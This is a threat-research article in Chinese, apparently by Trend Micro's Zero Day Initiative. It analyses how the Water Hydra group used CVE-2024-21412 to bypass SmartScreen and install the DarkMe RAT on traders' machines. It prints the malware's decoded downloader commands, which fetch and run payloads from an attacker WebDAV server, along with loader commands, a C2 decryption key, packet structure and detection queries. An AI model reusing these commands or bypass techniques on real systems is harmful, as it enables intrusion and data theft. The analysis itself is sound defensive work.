漏洞攻擊
CVE-2024-21412:Water Hydra 利用 Microsoft Defender SmartScreen 零時差漏洞攻擊金融交易機構
進階持續性滲透攻擊 (APT) 集團 Water Hydra 一直在利用 Microsoft Defender SmartScreen 漏洞 (CVE-2024-21412) 對金融交易機構發動攻擊。這個 Microsoft 目前已經修補的漏洞是由趨勢科技 Zero Day Initiative 所發現和揭露。
趨勢科技 Zero Day Initiative (ZDI) 漏洞懸賞計畫發現了 CVE-2024-21412 漏洞 (趨勢科技追蹤編號 ZDI-CAN-23100),並且向 Microsoft 通報其 Microsoft Defender SmartScreen 存在著這個可繞過其安全機制的漏洞,而且,我們命名為 Water Hydra (又名 DarkCasino) 的持續性進階滲透攻擊 (APT) 集團正在利用該漏洞對金融交易機構發動精密的零時差攻擊。
我們在 2023 年 12 月下旬開始追蹤一起 Water Hydra 集團使用類似工具、手法與程序 (TTP) 的攻擊行動,包括使用網際網路捷徑 (.URL 檔案) 以及「網站式分散編寫與版本控制」(Web-based Distributed Authoring and Versioning,簡稱 WebDAV) 元件。駭客在攻擊程序當中使用了 CVE-2024-21412 漏洞來繞過 Microsoft Defender SmartScreen 安全機制讓受害電腦感染 DarkMe 惡意程式。ZDI 漏洞懸賞計畫與 Microsoft 通力合作,共同揭露了這起零時差攻擊,並確保該漏洞迅速獲得修補。此外,趨勢科技也透過其資安解決方案來保護使用者,防範駭客利用 CVE-2024-21412 漏洞,詳情請參閱本文末端的資訊。
關於 Water Hydra APT 集團
Water Hydra 集團首次被發現是在 2021 年,當時該集團因為攻擊金融產業而聲名大噪,受害機構遍布全球,包括:銀行、虛擬加密貨幣平台、外匯與股票交易平台、賭博網站以及賭場。
一開始,由於該集團的攻擊使用了類似 Evilnum APT 集團的網路釣魚技巧與其他 TTP,因此被誤認為是 Evilnum 所為。2022 年 9 月,NSFOCUS 的研究人員在一起名為「DarkCasino」的攻擊行動當中發現了一個叫作「DarkMe」的 VisualBasic 遠端存取工具 (RAT),這起行動襲擊了歐洲地區的金融交易機構和賭博平台。
2023 年 11 月,在經過多起連續攻擊行動之後 (包括一起使用知名 WinRAR 程式碼執行漏洞 CVE-2023-38831 來攻擊股票交易機構的攻擊),情況便開始明朗:Water Hydra 是有別於 Evilnum 的 APT 集團。
Water Hydra 的攻擊模式顯然具備相當的技術層次與精密度,包括在攻擊程序當中使用尚未揭露的零時差漏洞。例如,Water Hydra 集團早在 2023 年 4 月期間就運用前面提到的 CVE-2023-38831 零時差漏洞襲擊了虛擬加密貨幣交易機構,而該漏洞是數個月後才被揭露。自從揭露之後,其他 APT 集團也開始跟著使用 CVE-2023-38831 漏洞,如:APT28 (FROZENLAKE)、APT29 (Cozy Bear)、APT40、Dark Pink、Ghostwriter、Konni 以及 Sandworm。
Water Hydra 的攻擊程序與 TTP
圖 1 顯示最早使用 CVE-2024-21412 漏洞的感染程序。自從 2024 年 1 月下旬開始,Water Hydra 便一直在使用一種簡化過的感染程序。
2024 年 1 月,Water Hydra APT 集團更新了他們使用 CVE-2024-21412 漏洞的感染程序,藉由執行一個惡意的 Microsoft 安裝檔案 (.MSI) 來簡化 DarkMe 的感染流程。
感染程序分析
本節完整分析 Water Hydra 攻擊行動如何使用 CVE-2024-21412 來繞過 Microsoft Defender SmartScreen 安全機制讓使用者感染 DarkMe 惡意程式。
在攻擊過程中,Water Hydra 先在外匯交易論壇與 Telegram 股票交易頻道上發動一波魚叉式網路釣魚行動 (T1566.002),利用各種社交工程技巧來引誘潛在的受害者 (金融交易人員),讓他們感染 DarkMe 惡意程式,例如:張貼訊息徵詢或提供交易建議、分享假的股票分析與金融工具 (如:技術分析與指標分析圖表),這些訊息全都含有一個網址指向一張由木馬程式偽裝的股票分析圖,位於已遭入侵的俄羅斯交易及虛擬加密貨幣資訊網站 (fxbulls[.]ru)。
值得注意的是,這個已遭入侵的 WordPress 網站與實際真正的外匯交易網站 fxbulls[.]com 同名,但所在位置卻是一個俄羅斯網域 (.ru)。
fxbulls[.]com 使用的是 MetaTrader 4 (MT4) 交易平台,其應用程式從 2022 年 9 月起就因為俄羅斯遭西方世界制裁而被 Apple App Store 下架。不過 Apple 在 2023 年 3 月左右已將 MT4 和另一個 MetaTrader 版本 (MT5) 重新上架。
在我們分析外匯交易論壇上的魚叉式網路釣魚行動期間,我們發現 Water Hydra 發表了不少英文和俄羅斯文的貼文。這些貼文大多是回覆有關外匯或股票交易技術分析圖的一般性問題,而且都會附上一個連結指向一張股票分析圖作誘餌。
只不過,這些貼文並非連上其宣稱的圖表,而是連回到一個已遭入侵的俄羅斯外匯、股票及虛擬加密貨幣新聞網站的 HTM/HTML 首頁,這個以 WordPress 架設的頁面上顯示著第二個惡意連結。這是一個偽裝成 JPEG 檔案下載連結的誘餌,它指向一個 WebDAV 共用資料夾。這些張貼 fxbulls[.]ru 惡意網站連結的帳號,有許多都是使用多年的帳號,顯示 DarkMe 攻擊行動可能利用了一些遭到入侵的合法交易論壇使用者帳號。
![連到 fxbulls[.]ru 惡意網站的頁面。](/content/dam/trendmicro/global/en/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-smartscreen-zero-day/water-hydra-5.jpg)
在連到 fxbulls[.]ru 的頁面上顯示了一個連結指向惡意的 WebDAV 共用資料夾,而且該頁面是一個精心過濾後的檢視。當使用者點選該連結時,瀏覽器會詢問使用者是否要在 Windows Explorer 當中開啟連結。由於這並非一個安全性通知,因此使用者也許不會覺得這個連結有害。
圖 6 顯示偽裝成 JPEG 的木馬程式會使用 Windows 進階查詢語法 (Advanced Query Syntax,簡稱 AQS)連回一個 WebDAV 共用資料夾。
在這起行動中,Water Hydra 運用了一個有趣的技巧來引誘受害者點選一個惡意的網際網路捷徑 (.url) 檔案。此技巧使用了 Microsoft Windows 的「search:」 應用程式協定,這有別於一般常見的「ms-search」協定。search: 協定是一個從 Windows Vista 開始提供的功能,可用來呼叫 Windows 桌面搜尋應用程式。在感染過程中,Water Hydra 使用了 search: 協定來搭配一段精心設計的進階搜尋語法 (AQS) 查詢敘述對 Windows 檔案總管視窗進行客製化修改來騙過受害者。
圖 7 顯示包含 search: 惡意網址的 HTML 程式碼 。該網址有以下幾點值得注意:
- 它使用 search: 應用程式協定的 search 指令來搜尋 photo_2023-12-29.jpg。
- 它使用 crumb 參數來將搜尋範圍限制在惡意的 WebDAV 共用資料夾上。
- 它使用 DisplayName 元素來騙過使用者,讓使用者誤以為這是在本機的「Downloads」(下載) 資料夾。
在點選了圖 7 中的連結之後,我們就會看到 Windows Explorer 呈現在受害者面前的畫面 (圖 8)。結合這一連串的技巧:search: 協定、AQS 查詢敘述以及 DisplayName 元素,Water Hydra 集團就能讓使用者誤以為這個來自 WebDAV 惡意伺服器的檔案已經下載到本機端,並誘騙他們點選這個偽裝成 JPEG 圖片的惡意檔案。這個 Windows 檔案總管視窗已經過精心特製,用來顯示一個惡意的 .url 檔案,檔名為 photo_2023-12-29.jpg.url。由於 Microsoft Windows 會自動隱藏「.url」副檔名,所以檔案名稱就會看起來像是個 JPEG 圖片檔。
CVE-2024-21412 主要是利用網際網路捷徑檔案,這類 .url 檔案只是單純的 INI 設定檔,並使用「URL=」作為參數來指向一個網址。儘管 .url 檔案格式並無官方文件可供參考,但這類檔案本身只需要 URL 這個參數。
在分析這個惡意的 .url 檔案時,我們注意到 Water Hydra 使用了 imagress.dll (Windows Image Resource) 圖示庫來自訂網際網路捷徑的圖示,它使用 IconFile= 和 IconIndex= 兩個參數進一步讓使用者誤以為惡意捷徑是正常檔案。只要使用者在這個偽裝成 JPEG 檔案的網際網路捷徑上點兩下,Water Hydra 就能利用 CVE-2024-21412 漏洞繞過 Microsoft Defender SmartScreen 安全機制,全面入侵 Windows 主機。
在分析攻擊 CVE-2024-21412 漏洞的網際網路捷徑檔案時,我們注意到一件不尋常的事。photo_2023-12-29.jpg.url 檔案中的 URL= 參數指向了另一個網際網路捷徑檔案,該檔案存放在某個 IPv4 位址的伺服器上。
我們在分析惡意的 WebDAV 共用資料夾時,有幸蒐集到 Water Hydra 所有用到的檔案,包括被參照到的 2.url 網際網路捷徑。我們循著參照一路追查之後發現 2.url 當中含有攻擊 CVE-2023-36025 漏洞的邏輯,這是先前已經修補的一個 Microsoft Defender SmartScreen 漏洞。前一陣我們在研究時曾經追查過一起專門利用此 CVE 漏洞的攻擊行動。
在一個網際網路捷徑當中參照另一個網際網路捷徑是極不尋常的情況。為了驗證這個異常行為有什麼效果,我們特別設計了一個概念驗證 (PoC) 測試來進一步加以分析。在 PoC 測試中,ZDI 團隊發現第一個捷徑有辦法繞過 CVE-2023-36025 漏洞的修補更新來避開 SmartScreen 的防護。經過內部的 PoC 測試與分析,我們得出一個結論,那就是在一個捷徑內呼叫另一個捷徑可以有效避開 SmartScreen 安全機制,讓 Mark-of-the-Web (Web 印記,簡稱 MotW) 功能無法發揮作用,這樣 Windows 就不會在使用者開啟或執行非信任來源的檔案時發出警報。分析完成之後,我們聯絡了 Microsoft 安全應變中心 (MSRC),通知他們有一個活躍中的 SmartScreen 零時差漏洞正在網路上遭到攻擊,並將我們的概念驗證提供給他們參考。
利用精心製作的 Windows 檔案總管視窗,Water Hydra 就能誘騙受害者點選攻擊 CVE-2024-21412 漏洞的連結,進而執行非信任來源的程式碼,這全都因為 Windows 的 MotW 功能無法發揮作用,使得 SmartScreen 的防護因而失效。而這一切感染程序都是在背景執行,因此被感染的使用者渾然不知。
在繞過 SmartScreen 之後,第二個捷徑 2.url 接著會執行駭客的 WebDAV 共用資料夾中一個 ZIP 檔案內的批次檔。這個批次檔會複製並執行來自惡意 WebDAV 共用資料夾的一個 DarkMe 載入器動態連結函式庫 (DLL) 。令人憂心的是這整個執行程序使用者都被蒙在鼓裡,而且 SmartScreen 也攔截不到。使用者幾乎完全看不到有事情正在發生的跡象。
在圖 13 當中,Sysinternals Process Explorer 顯示惡意的批次檔正在執行。這個批次檔是攻擊程序在利用 CVE-2024-21412 漏洞繞過 SmartScreen 防護之後執行的第一個腳本。
圖 14 的螢幕截圖顯示了多個連線到 Water Hydra WebDAV 共用資料夾的網路請求。我們可以在 WebDAV 當中看到數個 Property Find (PROPFIND) 請求向 WebDAV 伺服器取得以 XML 儲存的詳細資料。
一旦完成漏洞攻擊與感染的程序,駭客接下來會連線到 CC 伺服器的 WebDAV 來下載一個真正的 JPEG 檔案,該檔案與前面那個用來攻擊 CVE-2024-21412 漏洞、偽裝成 JPEG 的木馬程式同名。接著將這個檔案顯示給受害者看,讓受害者以為他們開啟的是下載目錄中的 JPEG 檔案 (完全不曉得自己的電腦已經感染了 DarkMe)。
DarkMe 下載器分析
| 檔案名稱 | b3.dll |
| MD5 | 409e7028f820e6854e7197cbb2c45d06 |
| SHA-1 | d41c5a3c7a96e7a542a71b8cc537b4a5b7b0cae7 |
| SHA-256 | bf9c3218f5929dfeccbbdc0ef421282921d6cbc06f270209b9868fc73a080b8c |
| 編譯器 | Win32 執行檔 Microsoft Visual Basic 6 [原生] |
| 原始名稱 | undersets.dll |
| 檔案類型 | Win32 DLL |
| TLSH | T18F856B9611E3EFACCAA049B8599FA01184A2CD3580355D73A191CE1BFB3AE13F4177B7 |
| 編譯日期 | 2024-01-04 |
表 1:DarkMe 下載器 (b3.dll) 的詳細資料。
DarkMe 下載器是一個使用 Visual Basic 撰寫的 DLL,負責從駭客的 WebDAV 下載和執行下一階段的惡意檔案。此惡意程式會使用電腦上的 cmd.exe (命令提示字元) 來執行一系列指令。這些指令在惡意程式內部是以字串反轉的技巧加密編碼。所以當要執行指令時,它首先會使用 Strings.StrReverse 方法來將字串還原成原本的指令,然後再利用 shell 方法來執行指令。很重要的一點是,惡意程式在載入時會參雜一些垃圾碼來掩蓋其真正的意圖,這可增加逆向工程的難度。為了研究和閱讀方便,本文呈現的程式碼都已經過解碼和清理。
下圖的程式碼顯示惡意程式如何執行上述動作:
解碼後的指令如下:
cmd /c copy /b \\84[.]32[.]189[.]74@80\fxbulls\pictures\7z[.]dll %TEMP%\7z[.]dll&&cmd /c copy /b \\84[.]32[.]189[.]74@80\fxbulls\pictures\7z[.]exe %TEMP%\7z[.]exe&&cmd /c \\84[.]32[.]189[.]74@80\fxbulls\pictures\photo_2023-12-29s[.]jpg&&cmd /c copy /b \\84[.]32[.]189[.]74@80\fxbulls\pictures\My2[.]zip %TEMP%\My2[.]zip&&timeout 1&&cmd /c cd %TEMP%&&7z x "My2[.]zip" -password-1 -y&&timeout 1&&cmd /c rundll32 undersets[.]dll, RunDllEntryPointW&&timeout 1&&pause
下表詳細說明下載器所執行的指令及作用:
| 指令 | 詳細說明 |
| cmd /c copy /b \\84[.]32[.]189[.]74@80\fxbulls\pictures\7z[.]dll %TEMP%\7z[.]dll&&cmd /c copy /b \\84[.]32[.]189[.]74@80\fxbulls\pictures\7z[.]exe | 將 7z.dll 和 7Z.exe 從 WebDAV 共享資料夾 (位於 \\84[.]32[.]189[.]74@80\fxbulls\pictures) 複製到被感染系統的 %TEMP% 本機暫存資料夾。 |
| cmd /c \\84[.]32[.]189[.]74@80\fxbulls\pictures\photo_2023-12-29s[.]jpg | 開啟並顯示一個股票分析圖 (photo_22023-12-29s.jpg) 來引開使用者注意力。 |
| cmd /c copy /b \\84[.]32[.]189[.]74@80\fxbulls\pictures\My2[.]zip %TEMP%\My2[.]zip | 將 My2.zip 從 WebDAV 共享資料夾 (位於 \\84[.]32[.]189[.]74@80\fxbulls\pictures) 複製到被感染系統的 %TEMP% 本機暫存資料夾。 |
| timeout 1 | 暫停腳本 1 秒鐘 |
| cmd /c cd %TEMP% | 將現行目錄更換至本機暫存資料夾。 |
| 7z x "My2[.]zip" -password-1 -y | 使用 7z (7-Zip) 指令列工具來解壓縮 My22[.]zip,使用「assword-1」作為密碼。「-y」旗標用來自動使用「Yes」(是) 來回覆所有對話方塊,例如是否要覆寫檔案。 |
| timeout 1 | 再次暫停腳本 1 秒鐘 |
| cmd /c rundll32 undersets[.]dll, RunDllEntryPointW | 使用 rundll32 這個 Windows 內建指令執行一個 DLL 檔案 (undersets[.]dll)。RunDllEntryPointW 很可能是 DLL 的進入點。這是惡意程式在感染系統時常用的技巧,可在一個合法的處理程序內執行某段程式碼。 |
| timeout 1 | 再次暫停腳本 1 秒鐘 |
| Pause | 等候使用者按鍵之後再繼續執行或終止處理程序,通常用來除錯,或者讓指令視窗維持在開啟狀態。 |
表 2:腳本所執行的指令。
在腳本的最後階段,惡意程式會使用 rundll32 來執行 undersets.dll 所匯出的 RunDllEntryPointW 函式。
下圖顯示 My2.zip 的內容:
DarkMe 載入器分析
| 檔案名稱 | undersets.dll |
| MD5 | 409e7028f820e6854e7197cbb2c45d06 |
| SHA-1 | d41c5a3c7a96e7a542a71b8cc537b4a5b7b0cae7 |
| SHA-256 | bf9c3218f5929dfeccbbdc0ef421282921d6cbc06f270209b9868fc73a080b8c |
| 編譯器 | Win32 執行檔 Microsoft Visual Basic 6 [原生] |
| 原始名稱 | undersets.dll |
| 檔案類型 | Win32 DLL |
| TLSH | T18F856B9611E3EFACCAA049B8599FA01184A2CD3580355D73A191CE1BFB3AE13F4177B7 |
| 編譯日期 | 2024-01-04 |
表 3:DarkMe 載入器 (undersets.dll) 的詳細資料。
執行時,載入器惡意程式會將 a1 和 a2 這兩個二進位檔案合併成一個 DarkMe 用到的新檔案:C:\Users\admin\AppData\Roaming\OnlineProjects\OnlineProject.dll。
為了避免二進位檔案當中的重要字串被輕易看到,惡意程式會將它們用十六進位方式編碼,執行時再視情況還原成 ASCII 格式。
為了方便研究和閱讀,所有垃圾碼都已清除,十六進位編碼的資料也已經還原成 ASCII 格式。
惡意程式會組合並執行以下指令,透過 reg.exe 工具從 kb.txt 檔案匯入系統登錄設定:
"C:\Windows\System32\cmd.exe" /c cd C:\Users\admin\AppData\Roaming\OnlineProjects&&cmd /c timeout 1&&cmd /c reg.exe import kb.txt
這些設定用來將 DarkMe 的惡意檔案 OnlineProject.dll 註冊成一個 COM 伺服器,並且在系統登錄當中設定好它的組態。
下圖顯示 kb.txt 系統登錄檔案的內容:
最後,為了執行惡意檔案,載入器會執行以下指令來呼叫前面註冊的 COM 類別:
"C:\Windows\SysWOW64\rundll32.exe" /sta {74A94F46-4FC5-4426-857B-FCE9D9286279}
DarkMe RAT 分析
| 檔案名稱 | OnlineProject.dll |
| MD5 | 93daa51c8af300f9948fe5fd51be3bfb |
| SHA-1 | a2ba225442d7d25b597cb882bb400a3f9722a5d4 |
| SHA-256 | d123d92346868aab77ac0fe4f7a1293ebb48cf5af1b01f85ffe7497af5b30738 |
| 編譯器 | Win32 執行檔 Microsoft Visual Basic 6 [原生] |
| 原始名稱 | buogaw1.ocx |
| 檔案類型 | Win32 DLL |
| TLSH | T1bb37ee6ef390e371a4468862785893d570ecb2bf4049a825fb12cb197bd5cfbe1a1713 |
| 編譯日期 | 2024-01-04 |
表 4:DarkMe RAT (OnlineProject.dll) 詳細資料。
這起攻擊最後植入的惡意檔案是一個名叫「DarkMe」的遠端存取工具 (RAT)。如同前面的載入器與下載器模組一樣,這個惡意程式也是一個用 Visual Basic 撰寫的 DLL 檔案,只不過它的加密編碼程度及垃圾碼的數量比前面兩者更高。此惡意程式會透過客製化 TCP 通訊協定與 CC 伺服器溝通。
惡意程式執行時會蒐集被感染系統的資訊,包括:電腦名稱、使用者名稱、已安裝的防毒軟體,以及前景視窗的標題。接下來,它會將向 CC 伺服器註冊受害的電腦。
為了建立網路連線並處理 socket 訊息,惡意程式會使用 CreateWindowEx 這個 Windows API 函式建立一個名稱為 SOCKET_WINDOW、類型為 STATIC 的隱藏視窗。這個隱藏視窗用來輔助它與伺服器之間的通訊,經由視窗訊息來傳遞 socket 資料。
CC 伺服器的網域名稱使用了 RC4 加密並儲存在一個名為 Text2022 的 VB.Form TextBox 當中。解密時,惡意程式使用了一個寫死的金鑰「noway123!$$#@35@!」。
接著,惡意程式將受害系統註冊到 CC 伺服器,並使用先前蒐集到的資訊,如:電腦名稱、使用者名稱、已安裝的防毒軟體,以及前景視窗的標題。
下圖顯示惡意程式在註冊受害系統時的初始網路流量:
下圖顯示 DarkMe 初始封包的結構:
| 封包 | 詳細說明 |
| 92 | 寫死的神奇代碼,代表資料外傳。 |
| 0xA9 xA9 0xA9 | 分隔字元 |
| US | 經由 GetLocaleInfo API 使用 LCType 所查詢到的國家代碼。 |
| United States | 經由 GetLocaleInfo API 使用 LCType LOCALE_SENGLISHCOUNTRYNAME 所查詢到的國家名稱。 |
| 0xA9 | 分隔字元 |
| DESKTOP-BFTPUHP/admin | 電腦名稱/使用者名稱 |
| 0xA9 | 分隔字元 |
| (Microsoft Defender) | 透過 Windows Management Instrumentation (WMI) 服務所查詢到的已安裝防毒軟體清單。如果系統上沒有安裝任何防毒軟體,那麼惡意程式會使用預設值「No Antivirus」。 |
| 0xA9 | 分隔字元 |
| 123 | 寫死的數值 (從 VB.TextBox Text10aa Text 讀取到的值)。 |
| 0xA9 | 分隔字元 |
| Microsoft Office Click-to-Run (SxS) | 前景視窗標題。如果桌面上未開啟任何視窗,那麼惡意程式就會使用 Darkme VB.Form 這個隱藏視窗的標題:Microsoft Office Click-to-Run(SxS) 。 |
| 0xA9 | 分隔字元 |
表 5:DarkMe 的初始封包結構。
為了檢查與 CC 伺服器的連線是否正常,惡意程式會定期發送一個心跳封包給伺服器。惡意程式會建立一個獨立的計時器 (名叫 Timer3) 並將間隔設定成 5555 毫秒來執行這項工作。圖 25 顯示一個心跳流量 (有些 DarkMe 變種會發送不一樣的數值):
當惡意程式完成受害電腦的註冊之後,接著會啟動一個監聽器來監聽對內的 TCP 連線以等候駭客下達指令。一旦收到指令,惡意程式就會解析指令的內容並在被感染的系統上執行指令。此惡意程式支援各式各樣的功能,包括可讓惡意程式列出目錄內容 (STRFLS、STRFL2)、執行指令列命令 (SHLEXE)、建立和刪除目錄、讀取系統磁碟資訊 (300100)、在指定路徑建立 ZIP 檔案 (ZIPALO) 等等。
結論
零時差攻擊是企業的一大資安風險,因為這類攻擊使用的是軟體廠商不知道且沒有安全修補的漏洞。像 Water Hydra 這樣的 APT 集團具備了發掘和攻擊零時差漏洞的技術知識和工具,而且還能運用在精密的攻擊行動當中,散播像 DarkMe 這樣具破壞力的惡意程式。
Water Hydra 早在數個月前的一起攻擊行動中,就趁著企業還無法捍衛自己時候利用 CVE-2023-38831 漏洞發動攻擊。當 CVE-2023-38831 被揭露之後,其他 APT 集團也立刻跟進,將該漏洞用於攻擊行動。目前 ZDI 已觀察到幾個令人擔憂的零時差漏洞濫用趨勢。首先第一個趨勢就是,駭客集團發現的零時差漏洞開始被一些國家級 APT 集團拿去利用,例如:APT28 (FROZENLAKE)、APT29 (Cozy Bear)、APT40、 Dark Pink、Ghostwriter、Konni、Sandworm 等等。這些集團利用這些漏洞來發動精密攻擊,使得企業機構的資安風險因而加劇。其次,CVE-2024-21412 漏洞單純只是駭客避開了 CVE-2023-36025 漏洞的修補機制就能達成,這突顯出資安修補更大的一個產業趨勢就是:APT 集團可以輕易地避開一些局部性的修補,就能找到新的途徑來攻擊原本已經修補過的軟體元件。
為了提升軟體安全、保護客戶不受零時差攻擊的危害,趨勢科技 Zero Day Initiative 隨時都在和資安研究人員及廠商合作,在 APT 集團將軟體漏洞應用到攻擊之前,預先加以修補並負責任地揭露。此外,ZDI 威脅追蹤團隊也會主動發掘網路上是否有零時差漏洞攻擊出現,來守護我們的世界。
企業可採用 Trend Vision One™️ 來防範這類攻擊,它能讓資安團隊持續發掘企業的攻擊面,全面保護已知、未知、受管理及未受管理的網路資產。Vision One 能協助企業判斷潛在風險 (例如漏洞) 的優先次序並盡快解決。它會參考各項關鍵因素,例如潛在攻擊的可能性和衝擊,同時還提供各式各樣的防護、偵測及回應功能。而這一切背後都有進階威脅研究、情報以及人工智慧作後盾,能縮短偵測、回應及矯正問題的時間。Vision One 的終極目標是要改善企業的整體資安狀況與成效,包括防範零時差攻擊。
在是否遭到入侵以及駭客行為和攻擊程序不確定的情況下,企業應假設自己的系統已經遭到入侵或外洩,並且立即隔離受影響的資料或工具。藉由更廣泛的視野以及更快速的回應,企業就能應付駭客入侵的問題並保護剩餘的系統。尤其,企業若採用像 Trend Micro Endpoint Security 和 Trend Micro Network Security 這樣的產品,以及 Trend Micro™ XDR 這類全方位的資安解決方案來偵測、掃描及攔截惡意內容,就能妥善因應現代化威脅情勢。
後記
在我們調查 CVE-2024-21412 漏洞與 Water Hydra 的期間,我們也開始追蹤更多使用這個零時差漏洞的駭客集團。特別值得注意的是 DarkGate 惡意程式集團已開始將此漏洞攻擊手法納入其感染程序當中。未來我們將另外撰寫一篇部落格文章來討論及分析一些使用 CVE-2024-21412 漏洞來發動攻擊的集團。趨勢科技的客戶目前已經可利用 ZDI-CAN-23100 虛擬修補來防範利用此漏洞的後續攻擊。
趨勢科技防護
以下是趨勢科技客戶可用來防範 CVE-2024-21412 零時差漏洞 (ZDI-CAN-23100) 及 DarkMe 惡意程式的趨勢科技防護:
- Potential Exploitation of Microsoft SmartScreen Detected (ZDI-CAN-23100)
- Exploitation of Microsoft SmartScreen Detected (CVE-2024-21412)
- Suspicious Activities Over WebDav
(productCode:sds OR productCode:pds OR productCode:xes OR productCode:sao) AND eventId:1 AND eventSubId:2 AND objectCmd:"rundll32.exe" AND objectCmd:/fxbulls/ AND ( objectCmd:.url OR objectCmd:.cmd)
(productCode:sds OR productCode:pds OR productCode:xes OR productCode:sao) AND eventId:1 AND eventSubId:2 AND objectCmd:"rundll32.exe" AND objectCmd:/underwall/ AND ( objectCmd:.url OR objectCmd:.cmd)
eventId:"100101" AND (request:"*84.32.189.74*" OR request:"87iavv.com")
eventId:3 AND (src:"84.32.189.74*" OR dst:"84.32.189.74*")
productCode:(pdi OR xns OR pds OR sds OR stp OR ptp OR xcs) AND (eventId:(100115 OR 100119) OR eventName:INTRUSION_DETECTION) AND (src:"84.32.189.74*" OR dst:"84.32.189.74*")
- 43700 - HTTP: Microsoft Windows Internet Shortcut SmartScreen Bypass Vulnerability
- 43701 - ZDI-CAN-23100: Zero Day Initiative Vulnerability (Microsoft Windows SmartScreen)
- 43266 - TCP: Backdoor.Win32.DarkMe.A Runtime Detection
- 4983: CVE-2024-21412 - Microsoft Windows SmartScreen Exploit - HTTP(Response)
- 1011949 - Microsoft Windows Internet Shortcut SmartScreen Bypass Vulnerability (CVE-2024-21412)
- 1011950 - Microsoft Windows Internet Shortcut SmartScreen Bypass Vulnerability Over SMB (CVE-2024-21412)
- 1011119 - Disallow Download Of Restricted File Formats (ATT&CK T1105)
- 1004294 - Identified Microsoft Windows Shortcut File Over WebDav
- 1005269 - Identified Download Of DLL File Over WebDav (ATT&CK T1574.002)
- 1006014 - Identified Microsoft BAT And CMD Files Over WebDav
入侵指標資料
如需本文提到的入侵指標完整清單,請至此處。
致謝
Zero Day Initiative 在此感謝以下趨勢科技人員的辛勞,讓我們確保所有客戶都能在修補更新之前預先防範此次的零時差漏洞:
Scott Graham、Mohamad Mokbel、Abdelrahman Esmail、Simon Dulude、Senthil Nathan Sankar 及Amit Kumar。此外也特別感謝內容撰寫與行銷團隊協助製作這份研究。
同時我們也要感謝 Microsoft 資安應變中心 (MSRC) 團隊,謝謝他們與我們持續保持合作,並且在最短時間內釋出修補更新。